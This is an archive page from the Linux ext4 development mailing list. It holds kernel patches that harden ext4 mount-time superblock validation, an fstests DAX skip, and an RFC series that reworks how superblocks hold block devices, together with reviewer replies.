Linux EXT4 FS development

Linux EXT4 FS development
 help / color / mirror / Atom feed

* [PATCH v2 1/3] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08 11:11 UTC (permalink / raw)
  To: linux-ext4
  Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
	Sashiko
In-Reply-To: <20260608111150.827117-1-libaokun@linux.alibaba.com>

The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().

If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum.  Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.

Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.

Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
 fs/ext4/super.c | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3ddcb4a8d4db 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
 		sbi->s_cluster_bits = 0;
 	}
 	sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
-	if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+	if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_clusters_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
 			 sbi->s_clusters_per_group);
 		return -EINVAL;
 	}
@@ -5304,8 +5305,9 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
 		return -EINVAL;
 	}
 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
-	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
+	    sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_inodes_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu",
 			 sbi->s_inodes_per_group);
 		return -EINVAL;
 	}
-- 
2.43.7


^ permalink raw reply related

* [PATCH v2 0/3] ext4: tighten mount-time superblock geometry validation
From: Baokun Li @ 2026-06-08 11:11 UTC (permalink / raw)
  To: linux-ext4; +Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list

Changes since v1:
 * Patch 1: Removed a spurious newline in the error message format string.
 * Added Patches 2 and 3 to fix additional issues reported by Sashiko
   (independent of Patch 1).

v1: https://patch.msgid.link/20260608061112.392391-1-libaokun@linux.alibaba.com

This series adds missing mount-time sanity checks for superblock
geometry parameters, preventing crafted filesystem images from causing
bitmap checksum corruption, integer overflow, or out-of-bounds inode
table access.

Patch 1 rejects filesystems where s_clusters_per_group or
s_inodes_per_group is not 8-aligned, since the bitmap checksum
functions operate on whole bytes and would leave trailing bits
unprotected.

Patch 2 reduces EXT4_MAX_CLUSTER_LOG_SIZE from 30 to 28 to match
the documented 256MB limit in mke2fs, preventing a 32-bit overflow
in the blocks-per-group consistency check on bigalloc filesystems.

Patch 3 rejects filesystems where s_inodes_per_group is not a
multiple of s_inodes_per_block, preventing truncation in the
s_itb_per_group calculation that could lead __ext4_get_inode_loc()
to read beyond the inode table.

Baokun Li (3):
  ext4: reject mount if clusters/inodes per group are not 8-aligned
  ext4: reduce max cluster size to match documented 256MB limit
  ext4: reject mount if inodes per group is not a multiple of inodes per
    block

 fs/ext4/ext4.h  |  2 +-
 fs/ext4/super.c | 11 +++++++----
 2 files changed, 8 insertions(+), 5 deletions(-)

-- 
2.43.7

^ permalink raw reply

* [PATCH v3] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-08 10:23 UTC (permalink / raw)
  To: fstests
  Cc: linux-ext4, linux-fsdevel, linux-xfs, ritesh.list, ojaswin,
	djwong, Disha Goel

Online defragmentation is not supported on ext4 DAX-enabled filesystems.
The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
on DAX files.

Add an ext4-specific check in _require_defrag() to skip tests when DAX
is enabled, avoiding false failures on ext4/301-304, ext4/308, and
generic/018.

XFS defrag works with DAX, so this check is ext4-specific.

Suggested-by: Darrick J. Wong <djwong@kernel.org>
Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
---
Changes in v3:
- Move the DAX check inside the ext4 case statement as
  suggested by Darrick

 common/defrag | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/common/defrag b/common/defrag
index 055d0d0e..baf05d94 100644
--- a/common/defrag
+++ b/common/defrag
@@ -13,6 +13,8 @@ _require_defrag()
         DEFRAG_PROG="$XFS_FSR_PROG"
 	;;
     ext4)
+        __scratch_uses_fsdax && _notrun "ext4 online defrag not supported with DAX"
+
 	testfile="$TEST_DIR/$$-test.defrag"
 	donorfile="$TEST_DIR/$$-donor.defrag"
 	bsize=`_get_block_size $TEST_DIR`
-- 
2.45.1


^ permalink raw reply related

* Re: [PATCH RFC 8/8] super: make fs_holder_ops private
From: Jan Kara @ 2026-06-08 10:18 UTC (permalink / raw)
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-8-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:14, Christian Brauner wrote:
> There's no need to expose it anymore.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  fs/super.c | 3 +--
>  1 file changed, 1 insertion(+), 2 deletions(-)
> 
> diff --git a/fs/super.c b/fs/super.c
> index cea743f699e4..983c2fbf5202 100644
> --- a/fs/super.c
> +++ b/fs/super.c
> @@ -1643,13 +1643,12 @@ static int fs_bdev_thaw(struct block_device *bdev)
>  	return error;
>  }
>  
> -const struct blk_holder_ops fs_holder_ops = {
> +static const struct blk_holder_ops fs_holder_ops = {
>  	.mark_dead		= fs_bdev_mark_dead,
>  	.sync			= fs_bdev_sync,
>  	.freeze			= fs_bdev_freeze,
>  	.thaw			= fs_bdev_thaw,
>  };
> -EXPORT_SYMBOL_GPL(fs_holder_ops);
>  
>  static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
>  {
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

^ permalink raw reply

* Re: [PATCH RFC 6/8] ext4: open via dedicated fs bdev helpers
From: Jan Kara @ 2026-06-08 10:18 UTC (permalink / raw)
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-6-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:12, Christian Brauner wrote:
> Route opens through fs_bdev_file_open_by_path() so each external device
> is registered against the correct superblock, and convert the matching
> releases.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  fs/ext4/super.c | 12 ++++++------
>  1 file changed, 6 insertions(+), 6 deletions(-)
> 
> diff --git a/fs/ext4/super.c b/fs/ext4/super.c
> index 6a77db4d3124..8108d999008e 100644
> --- a/fs/ext4/super.c
> +++ b/fs/ext4/super.c
> @@ -5793,7 +5793,7 @@ failed_mount8: __maybe_unused
>  	brelse(sbi->s_sbh);
>  	if (sbi->s_journal_bdev_file) {
>  		invalidate_bdev(file_bdev(sbi->s_journal_bdev_file));
> -		bdev_fput(sbi->s_journal_bdev_file);
> +		fs_bdev_file_release(sbi->s_journal_bdev_file, sb);
>  	}
>  out_fail:
>  	invalidate_bdev(sb->s_bdev);
> @@ -5972,9 +5972,9 @@ static struct file *ext4_get_journal_blkdev(struct super_block *sb,
>  	struct ext4_super_block *es;
>  	int errno;
>  
> -	bdev_file = bdev_file_open_by_dev(j_dev,
> +	bdev_file = fs_bdev_file_open_by_dev(j_dev,
>  		BLK_OPEN_READ | BLK_OPEN_WRITE | BLK_OPEN_RESTRICT_WRITES,
> -		sb, &fs_holder_ops);
> +		sb, sb);
>  	if (IS_ERR(bdev_file)) {
>  		ext4_msg(sb, KERN_ERR,
>  			 "failed to open journal device unknown-block(%u,%u) %ld",
> @@ -6034,7 +6034,7 @@ static struct file *ext4_get_journal_blkdev(struct super_block *sb,
>  out_bh:
>  	brelse(bh);
>  out_bdev:
> -	bdev_fput(bdev_file);
> +	fs_bdev_file_release(bdev_file, sb);
>  	return ERR_PTR(errno);
>  }
>  
> @@ -6073,7 +6073,7 @@ static journal_t *ext4_open_dev_journal(struct super_block *sb,
>  out_journal:
>  	ext4_journal_destroy(EXT4_SB(sb), journal);
>  out_bdev:
> -	bdev_fput(bdev_file);
> +	fs_bdev_file_release(bdev_file, sb);
>  	return ERR_PTR(errno);
>  }
>  
> @@ -7492,7 +7492,7 @@ static void ext4_kill_sb(struct super_block *sb)
>  	kill_block_super(sb);
>  
>  	if (bdev_file)
> -		bdev_fput(bdev_file);
> +		fs_bdev_file_release(bdev_file, sb);
>  }
>  
>  static struct file_system_type ext4_fs_type = {
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

^ permalink raw reply

* Re: [PATCH RFC 4/8] xfs: port to fs_bdev_file_open_by_path()
From: Jan Kara @ 2026-06-08 10:15 UTC (permalink / raw)
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-4-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:10, Christian Brauner wrote:
> Route opens through fs_bdev_file_open_by_path() so each external device
> is registered against mp->m_super, and convert the matching releases.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  fs/xfs/xfs_buf.c   |  2 +-
>  fs/xfs/xfs_super.c | 10 +++++-----
>  2 files changed, 6 insertions(+), 6 deletions(-)
> 
> diff --git a/fs/xfs/xfs_buf.c b/fs/xfs/xfs_buf.c
> index 580d40a5ee57..3d3b29edb156 100644
> --- a/fs/xfs/xfs_buf.c
> +++ b/fs/xfs/xfs_buf.c
> @@ -1601,7 +1601,7 @@ xfs_free_buftarg(
>  	fs_put_dax(btp->bt_daxdev, btp->bt_mount);
>  	/* the main block device is closed by kill_block_super */
>  	if (btp->bt_bdev != btp->bt_mount->m_super->s_bdev)
> -		bdev_fput(btp->bt_file);
> +		fs_bdev_file_release(btp->bt_file, btp->bt_mount->m_super);
>  	kfree(btp);
>  }
>  
> diff --git a/fs/xfs/xfs_super.c b/fs/xfs/xfs_super.c
> index f8de44443e81..304667210695 100644
> --- a/fs/xfs/xfs_super.c
> +++ b/fs/xfs/xfs_super.c
> @@ -400,8 +400,8 @@ xfs_blkdev_get(
>  	blk_mode_t		mode;
>  
>  	mode = sb_open_mode(mp->m_super->s_flags);
> -	*bdev_filep = bdev_file_open_by_path(name, mode,
> -			mp->m_super, &fs_holder_ops);
> +	*bdev_filep = fs_bdev_file_open_by_path(name, mode,
> +			mp->m_super, mp->m_super);
>  	if (IS_ERR(*bdev_filep)) {
>  		error = PTR_ERR(*bdev_filep);
>  		*bdev_filep = NULL;
> @@ -526,7 +526,7 @@ xfs_open_devices(
>  		mp->m_logdev_targp = mp->m_ddev_targp;
>  		/* Handle won't be used, drop it */
>  		if (logdev_file)
> -			bdev_fput(logdev_file);
> +			fs_bdev_file_release(logdev_file, mp->m_super);
>  	}
>  
>  	return 0;
> @@ -538,10 +538,10 @@ xfs_open_devices(
>  	xfs_free_buftarg(mp->m_ddev_targp);
>   out_close_rtdev:
>  	 if (rtdev_file)
> -		bdev_fput(rtdev_file);
> +		fs_bdev_file_release(rtdev_file, mp->m_super);
>   out_close_logdev:
>  	if (logdev_file)
> -		bdev_fput(logdev_file);
> +		fs_bdev_file_release(logdev_file, mp->m_super);
>  	return error;
>  }
>  
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

^ permalink raw reply

* Re: [PATCH RFC 2/8] fs: add a global device to super block hash table
From: Jan Kara @ 2026-06-08 10:14 UTC (permalink / raw)
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-2-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:08, Christian Brauner wrote:
> fs_holder_ops recovers the owning superblock from bdev->bd_holder, which
> forces the holder to be exactly one superblock and prevents several
> superblocks from sharing one block device. That's what erofs is doing.
> 
> Introduce a global dev_t-keyed rhltable mapping each block device to the
> superblock(s) using it. The holder argument becomes purely the block
> layer's exclusivity token (a superblock, or a file_system_type for
> shared devices) and is no longer needed by the fs specific callbacks.
> 
> Registration keeps one entry per (device, superblock). When a filesystem
> claims a device it already uses (xfs with its log on the data device), no
> second entry is added, so each superblock is acted on once.
> 
> Each table entry holds a passive reference (s_count) on its superblock,
> so the struct stays valid for as long as the entry is reachable. The
> callbacks look the device up in the table and act on every superblock
> using it:
> 
> Unlinking an entry is deferred to the last unpin, so a cursor never
> resumes from a removed node. After this it's possible to act on all
> superblocks that share a given device.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Looks good! One comment below:

>  static void fs_bdev_mark_dead(struct block_device *bdev, bool surprise)
>  {
> -	struct super_block *sb;
> +	struct fs_bdev_holder *h;
> +	dev_t dev = bdev->bd_dev;
>  
> -	sb = bdev_super_lock(bdev, false);
> -	if (!sb)
> -		return;
> +	mutex_unlock(&bdev->bd_holder_lock);

The moment we drop bd_holder_lock, there's nothing which prevents the bdev
owner from changing. So this can lead to a situation where we miss calling
->mark_dead callback of the new holder. Similarly for all the other holder
ops. I didn't find a situation where it would actually matter so I think
we're fine but it's a potential catch. Anyway, feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

>  
> -	if (sb->s_op->remove_bdev) {
> -		int ret;
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		struct super_block *sb = h->sb;
>  
> -		ret = sb->s_op->remove_bdev(sb, bdev);
> -		if (!ret) {
> -			super_unlock_shared(sb);
> -			return;
> +		if (!super_lock_shared(sb))
> +			continue;
> +		if (sb->s_root && (sb->s_flags & SB_ACTIVE)) {
> +			if (!sb->s_op->remove_bdev ||
> +			    sb->s_op->remove_bdev(sb, bdev)) {
> +				if (!surprise)
> +					sync_filesystem(sb);
> +				shrink_dcache_sb(sb);
> +				evict_inodes(sb);
> +				if (sb->s_op->shutdown)
> +					sb->s_op->shutdown(sb);
> +			}
>  		}
> -		/* Fallback to shutdown. */
> +		super_unlock_shared(sb);
>  	}
> -
> -	if (!surprise)
> -		sync_filesystem(sb);
> -	shrink_dcache_sb(sb);
> -	evict_inodes(sb);
> -	if (sb->s_op->shutdown)
> -		sb->s_op->shutdown(sb);
> -
> -	super_unlock_shared(sb);
>  }
>  
>  static void fs_bdev_sync(struct block_device *bdev)
>  {
> -	struct super_block *sb;
> +	struct fs_bdev_holder *h;
> +	dev_t dev = bdev->bd_dev;
>  
> -	sb = bdev_super_lock(bdev, false);
> -	if (!sb)
> -		return;
> +	mutex_unlock(&bdev->bd_holder_lock);
>  
> -	sync_filesystem(sb);
> -	super_unlock_shared(sb);
> -}
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		struct super_block *sb = h->sb;
>  
> -static struct super_block *get_bdev_super(struct block_device *bdev)
> -{
> -	bool active = false;
> -	struct super_block *sb;
> -
> -	sb = bdev_super_lock(bdev, true);
> -	if (sb) {
> -		active = atomic_inc_not_zero(&sb->s_active);
> -		super_unlock_excl(sb);
> +		if (!super_lock_shared(sb))
> +			continue;
> +		if (sb->s_root && (sb->s_flags & SB_ACTIVE))
> +			sync_filesystem(sb);
> +		super_unlock_shared(sb);
>  	}
> -	if (!active)
> -		return NULL;
> -	return sb;
>  }
>  
>  /**
> - * fs_bdev_freeze - freeze owning filesystem of block device
> + * fs_bdev_freeze - freeze every superblock using a block device
>   * @bdev: block device
>   *
> - * Freeze the filesystem that owns this block device if it is still
> - * active.
> - *
> - * A filesystem that owns multiple block devices may be frozen from each
> - * block device and won't be unfrozen until all block devices are
> - * unfrozen. Each block device can only freeze the filesystem once as we
> - * nest freezes for block devices in the block layer.
> + * Freeze each live superblock using @bdev.  A superblock owning several block
> + * devices is frozen once per device and stays frozen until all are thawed; the
> + * block layer nests these freezes so the count stays balanced.
>   *
> - * Return: If the freeze was successful zero is returned. If the freeze
> - *         failed a negative error code is returned.
> + * Return: 0, or the error from the one superblock on a single-fs device.  When
> + *         several superblocks share @bdev a per-superblock failure is swallowed
> + *         (see below), but a sync_blockdev() failure is always reported.
>   */
>  static int fs_bdev_freeze(struct block_device *bdev)
>  {
> -	struct super_block *sb;
> -	int error = 0;
> +	dev_t dev = bdev->bd_dev;
> +	struct fs_bdev_holder *h;
> +	unsigned int count = 0;
> +	int error = 0, err;
>  
>  	lockdep_assert_held(&bdev->bd_fsfreeze_mutex);
>  
> -	sb = get_bdev_super(bdev);
> -	if (!sb)
> -		return -EINVAL;
> +	mutex_unlock(&bdev->bd_holder_lock);
>  
> -	if (sb->s_op->freeze_super)
> -		error = sb->s_op->freeze_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> -	else
> -		error = freeze_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		if (!atomic_inc_not_zero(&h->sb->s_active))
> +			continue;
> +		err = fs_super_freeze(h->sb);
> +		if (err && !error)
> +			error = err;
> +		deactivate_super(h->sb);
> +		count++;
> +	}
> +
> +	/*
> +	 * When several superblocks share the device, keep it frozen even if some
> +	 * of them failed to freeze and swallow the error: rolling the rest back
> +	 * via thaw_super() can fail too, so neither is a clear win. A single
> +	 * filesystem (count == 1) still reports its error.
> +	 */
> +	if (error && count > 1)
> +		error = 0;
>  	if (!error)
>  		error = sync_blockdev(bdev);
> -	deactivate_super(sb);
>  	return error;
>  }
>  
>  /**
> - * fs_bdev_thaw - thaw owning filesystem of block device
> + * fs_bdev_thaw - thaw every superblock using a block device
>   * @bdev: block device
>   *
> - * Thaw the filesystem that owns this block device.
> + * The counterpart to fs_bdev_freeze(): thaw each live superblock using @bdev.
> + * A zero return does not imply a superblock is fully unfrozen; it may have been
> + * frozen more than once (by the kernel or via another device).
>   *
> - * A filesystem that owns multiple block devices may be frozen from each
> - * block device and won't be unfrozen until all block devices are
> - * unfrozen. Each block device can only freeze the filesystem once as we
> - * nest freezes for block devices in the block layer.
> - *
> - * Return: If the thaw was successful zero is returned. If the thaw
> - *         failed a negative error code is returned. If this function
> - *         returns zero it doesn't mean that the filesystem is unfrozen
> - *         as it may have been frozen multiple times (kernel may hold a
> - *         freeze or might be frozen from other block devices).
> + * Return: 0, or the first error on a single-fs device; a shared device swallows
> + *         per-superblock errors, as fs_bdev_freeze() does.
>   */
>  static int fs_bdev_thaw(struct block_device *bdev)
>  {
> -	struct super_block *sb;
> -	int error;
> +	dev_t dev = bdev->bd_dev;
> +	struct fs_bdev_holder *h;
> +	unsigned int count = 0;
> +	int error = 0, err;
>  
>  	lockdep_assert_held(&bdev->bd_fsfreeze_mutex);
>  
> -	/*
> -	 * The block device may have been frozen before it was claimed by a
> -	 * filesystem. Concurrently another process might try to mount that
> -	 * frozen block device and has temporarily claimed the block device for
> -	 * that purpose causing a concurrent fs_bdev_thaw() to end up here. The
> -	 * mounter is already about to abort mounting because they still saw an
> -	 * elevanted bdev->bd_fsfreeze_count so get_bdev_super() will return
> -	 * NULL in that case.
> -	 */
> -	sb = get_bdev_super(bdev);
> -	if (!sb)
> -		return -EINVAL;
> +	mutex_unlock(&bdev->bd_holder_lock);
>  
> -	if (sb->s_op->thaw_super)
> -		error = sb->s_op->thaw_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> -	else
> -		error = thaw_super(sb,
> -				FREEZE_MAY_NEST | FREEZE_HOLDER_USERSPACE, NULL);
> -	deactivate_super(sb);
> +	for (h = fs_bdev_first(dev); h; h = fs_bdev_next(h)) {
> +		if (!atomic_inc_not_zero(&h->sb->s_active))
> +			continue;
> +		err = fs_super_thaw(h->sb);
> +		if (err && !error)
> +			error = err;
> +		deactivate_super(h->sb);
> +		count++;
> +	}
> +
> +	/* Shared device: swallow per-superblock errors, like fs_bdev_freeze(). */
> +	if (error && count > 1)
> +		error = 0;
>  	return error;
>  }
>  
> @@ -1602,6 +1651,131 @@ const struct blk_holder_ops fs_holder_ops = {
>  };
>  EXPORT_SYMBOL_GPL(fs_holder_ops);
>  
> +static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
> +{
> +	dev_t dev = file_bdev(bdev_file)->bd_dev;
> +	struct rhlist_head *list, *pos;
> +	struct fs_bdev_holder *h;
> +	int err;
> +
> +	/*
> +	 * A superblock may claim one device more than once (xfs with its log on
> +	 * the data device).  Keep a single entry per (device, superblock) and
> +	 * count the claims in @fs_bdev_active; the entry lives until the last one
> +	 * is released.
> +	 */
> +	scoped_guard(rcu) {
> +		list = rhltable_lookup(&fs_bdev_supers, &dev, fs_bdev_params);
> +		rhl_for_each_entry_rcu(h, pos, list, node)
> +			if (h->sb == sb && refcount_inc_not_zero(&h->fs_bdev_active))
> +				return 0;
> +	}
> +
> +	h = kmalloc(sizeof(*h), GFP_KERNEL);
> +	if (!h)
> +		return -ENOMEM;
> +	h->dev = dev;
> +	h->sb = sb;
> +	refcount_set(&h->fs_bdev_passive, 1);
> +	refcount_set(&h->fs_bdev_active, 1);
> +
> +	err = rhltable_insert(&fs_bdev_supers, &h->node, fs_bdev_params);
> +	if (err) {
> +		kfree(h);
> +		return err;
> +	}
> +
> +	/* The sb->s_count ref keeps @h->sb valid for as long as the entry exists. */
> +	spin_lock(&sb_lock);
> +	sb->s_count++;
> +	spin_unlock(&sb_lock);
> +
> +	return 0;
> +}
> +
> +/**
> + * fs_bdev_file_open_by_dev - claim a block device on behalf of a superblock
> + * @dev: block device number
> + * @mode: open mode
> + * @holder: block-layer exclusivity token (a superblock, or the file_system_type
> + *          when the device may be shared by several superblocks of that type)
> + * @sb: superblock to drive fs_holder_ops events for
> + *
> + * Open @dev with &fs_holder_ops and register that @sb uses it, so device
> + * removal/sync/freeze/thaw are propagated to @sb (and any other superblock
> + * sharing @dev).  Must be paired with fs_bdev_file_release().
> + *
> + * Return: an opened block-device file or an ERR_PTR().
> + */
> +struct file *fs_bdev_file_open_by_dev(dev_t dev, blk_mode_t mode, void *holder,
> +				      struct super_block *sb)
> +{
> +	struct file *bdev_file;
> +	int err;
> +
> +	bdev_file = bdev_file_open_by_dev(dev, mode, holder, &fs_holder_ops);
> +	if (IS_ERR(bdev_file))
> +		return bdev_file;
> +
> +	err = fs_bdev_register(bdev_file, sb);
> +	if (err) {
> +		bdev_fput(bdev_file);
> +		return ERR_PTR(err);
> +	}
> +	return bdev_file;
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_open_by_dev);
> +
> +struct file *fs_bdev_file_open_by_path(const char *path, blk_mode_t mode,
> +				       void *holder, struct super_block *sb)
> +{
> +	struct file *bdev_file;
> +	int err;
> +
> +	bdev_file = bdev_file_open_by_path(path, mode, holder, &fs_holder_ops);
> +	if (IS_ERR(bdev_file))
> +		return bdev_file;
> +
> +	err = fs_bdev_register(bdev_file, sb);
> +	if (err) {
> +		bdev_fput(bdev_file);
> +		return ERR_PTR(err);
> +	}
> +	return bdev_file;
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_open_by_path);
> +
> +/**
> + * fs_bdev_file_release - release a block device claimed for a superblock
> + * @bdev_file: file returned by fs_bdev_file_open_by_{dev,path}()
> + * @sb: superblock the device was claimed for
> + *
> + * Drop one claim on the {dev, @sb} entry; the last claim unregisters it (a
> + * pinning cursor defers the actual unlink).  Then close the block device.
> + */
> +void fs_bdev_file_release(struct file *bdev_file, struct super_block *sb)
> +{
> +	dev_t dev = file_bdev(bdev_file)->bd_dev;
> +	struct fs_bdev_holder *h, *found = NULL;
> +	struct rhlist_head *list, *pos;
> +
> +	rcu_read_lock();
> +	list = rhltable_lookup(&fs_bdev_supers, &dev, fs_bdev_params);
> +	rhl_for_each_entry_rcu(h, pos, list, node) {
> +		if (h->sb != sb)
> +			continue;
> +		/* At most one entry per (dev, sb); the last claim drops the bias. */
> +		if (refcount_dec_and_test(&h->fs_bdev_active))
> +			found = h;
> +		break;
> +	}
> +	rcu_read_unlock();
> +	if (found)
> +		fs_bdev_holder_put(found);
> +	bdev_fput(bdev_file);
> +}
> +EXPORT_SYMBOL_GPL(fs_bdev_file_release);
> +
>  int setup_bdev_super(struct super_block *sb, int sb_flags,
>  		struct fs_context *fc)
>  {
> @@ -1609,7 +1783,7 @@ int setup_bdev_super(struct super_block *sb, int sb_flags,
>  	struct file *bdev_file;
>  	struct block_device *bdev;
>  
> -	bdev_file = bdev_file_open_by_dev(sb->s_dev, mode, sb, &fs_holder_ops);
> +	bdev_file = fs_bdev_file_open_by_dev(sb->s_dev, mode, sb, sb);
>  	if (IS_ERR(bdev_file)) {
>  		if (fc)
>  			errorf(fc, "%s: Can't open blockdev", fc->source);
> @@ -1623,7 +1797,7 @@ int setup_bdev_super(struct super_block *sb, int sb_flags,
>  	 * writable from userspace even for a read-only block device.
>  	 */
>  	if ((mode & BLK_OPEN_WRITE) && bdev_read_only(bdev)) {
> -		bdev_fput(bdev_file);
> +		fs_bdev_file_release(bdev_file, sb);
>  		return -EACCES;
>  	}
>  
> @@ -1634,7 +1808,7 @@ int setup_bdev_super(struct super_block *sb, int sb_flags,
>  	if (atomic_read(&bdev->bd_fsfreeze_count) > 0) {
>  		if (fc)
>  			warnf(fc, "%pg: Can't mount, blockdev is frozen", bdev);
> -		bdev_fput(bdev_file);
> +		fs_bdev_file_release(bdev_file, sb);
>  		return -EBUSY;
>  	}
>  	spin_lock(&sb_lock);
> @@ -1725,7 +1899,7 @@ void kill_block_super(struct super_block *sb)
>  	generic_shutdown_super(sb);
>  	if (bdev) {
>  		sync_blockdev(bdev);
> -		bdev_fput(sb->s_bdev_file);
> +		fs_bdev_file_release(sb->s_bdev_file, sb);
>  	}
>  }
>  
> diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
> index c8494d64a69d..43d37c02febf 100644
> --- a/include/linux/blkdev.h
> +++ b/include/linux/blkdev.h
> @@ -1760,13 +1760,6 @@ struct blk_holder_ops {
>  	int (*thaw)(struct block_device *bdev);
>  };
>  
> -/*
> - * For filesystems using @fs_holder_ops, the @holder argument passed to
> - * helpers used to open and claim block devices via
> - * bd_prepare_to_claim() must point to a superblock.
> - */
> -extern const struct blk_holder_ops fs_holder_ops;
> -
>  /*
>   * Return the correct open flags for blkdev_get_by_* for super block flags
>   * as stored in sb->s_flags.
> diff --git a/include/linux/fs/super.h b/include/linux/fs/super.h
> index f21ffbb6dea5..721d842e3b24 100644
> --- a/include/linux/fs/super.h
> +++ b/include/linux/fs/super.h
> @@ -235,4 +235,11 @@ int freeze_super(struct super_block *super, enum freeze_holder who,
>  int thaw_super(struct super_block *super, enum freeze_holder who,
>  	       const void *freeze_owner);
>  
> +struct file;
> +struct file *fs_bdev_file_open_by_dev(dev_t dev, blk_mode_t mode, void *holder,
> +				      struct super_block *sb);
> +struct file *fs_bdev_file_open_by_path(const char *path, blk_mode_t mode,
> +				       void *holder, struct super_block *sb);
> +void fs_bdev_file_release(struct file *bdev_file, struct super_block *sb);
> +
>  #endif /* _LINUX_FS_SUPER_H */
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

^ permalink raw reply

* Re: [PATCH RFC 3/8] fs: refuse to claim any frozen block device
From: Jan Kara @ 2026-06-08 10:01 UTC (permalink / raw)
  To: Christian Brauner
